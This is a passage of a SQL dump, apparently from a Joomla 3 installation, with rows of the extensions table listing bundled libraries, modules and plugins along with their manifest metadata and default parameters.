Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phputf8\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,'Joomla! Platform','library','joomla','',0,1,1,1,'{\"name\":\"Joomla! Platform\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"mediaversion\":\"1d15dfbb748779dbbfe1025519c90329\"}','','',0,'0000-00-00 00:00:00',0,0),(104,'IDNA Convert','library','idna_convert','',0,1,1,1,'{\"name\":\"IDNA Convert\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"idna_convert\"}','','','',0,'0000-00-00 00:00:00',0,0),(105,'FOF','library','fof','',0,1,1,1,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2015-04-22 13:15:32\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2015 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.4.3\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fof\"}','','','',0,'0000-00-00 00:00:00',0,0),(106,'PHPass','library','phpass','',0,1,1,1,'{\"name\":\"PHPass\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpass\"}','','','',0,'0000-00-00 00:00:00',0,0),(200,'mod_articles_archive','module','mod_articles_archive','',0,1,1,0,'{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_archive\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,'mod_articles_latest','module','mod_articles_latest','',0,1,1,0,'{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,'mod_banners','module','mod_banners','',0,1,1,0,'{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_banners\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_breadcrumbs\"}','','','',0,'0000-00-00 00:00:00',0,0),(205,'mod_custom','module','mod_custom','',0,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,'mod_feed','module','mod_feed','',0,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,'mod_footer','module','mod_footer','',0,1,1,0,'{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_footer\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,'mod_login','module','mod_login','',0,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,'mod_menu','module','mod_menu','',0,1,1,1,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_news\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_random_image\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_related_items\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,'mod_search','module','mod_search','',0,1,1,0,'{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_search\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,'mod_stats','module','mod_stats','',0,1,1,0,'{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_syndicate\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,'mod_users_latest','module','mod_users_latest','',0,1,1,0,'{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_users_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_whosonline\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,'mod_articles_category','module','mod_articles_category','',0,1,1,0,'{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_category\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,'mod_articles_categories','module','mod_articles_categories','',0,1,1,0,'{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_categories\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,'mod_languages','module','mod_languages','',0,1,1,1,'{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_languages\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,'mod_finder','module','mod_finder','',0,1,0,0,'{\"name\":\"mod_finder\",\"type\":\"module\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(300,'mod_custom','module','mod_custom','',1,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,'mod_feed','module','mod_feed','',1,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,'mod_latest','module','mod_latest','',1,1,1,0,'{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,'mod_logged','module','mod_logged','',1,1,1,0,'{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_logged\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,'mod_login','module','mod_login','',1,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,'mod_menu','module','mod_menu','',1,1,1,0,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(307,'mod_popular','module','mod_popular','',1,1,1,0,'{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_quickicon\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,'mod_status','module','mod_status','',1,1,1,0,'{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_status\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_submenu\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,'mod_title','module','mod_title','',1,1,1,0,'{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_title\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_toolbar\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_multilangstatus\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,'mod_version','module','mod_version','',1,1,1,0,'{\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(315,'mod_stats_admin','module','mod_stats_admin','',1,1,1,0,'{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats_admin\"}','{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(316,'mod_tags_popular','module','mod_tags_popular','',0,1,1,0,'{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_popular\"}','{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(317,'mod_tags_similar','module','mod_tags_similar','',0,1,1,0,'{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_similar\"}','{\"maximum\":\"5\",\"matchtype\":\"any\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(400,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"gmail\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','','','',0,'0000-00-00 00:00:00',0,0),(402,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ldap\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(403,'plg_content_contact','plugin','contact','content',0,1,1,0,'{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','','','',0,'0000-00-00 00:00:00',1,0),(404,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"emailcloak\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(406,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"loadmodule\"}','{\"style\":\"xhtml\"}','','',0,'2011-09-18 15:22:50',0,0),(407,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,0,'{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,0,'{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagenavigation\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,'plg_content_vote','plugin','vote','content',0,1,1,0,'{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"vote\"}','','','',0,'0000-00-00 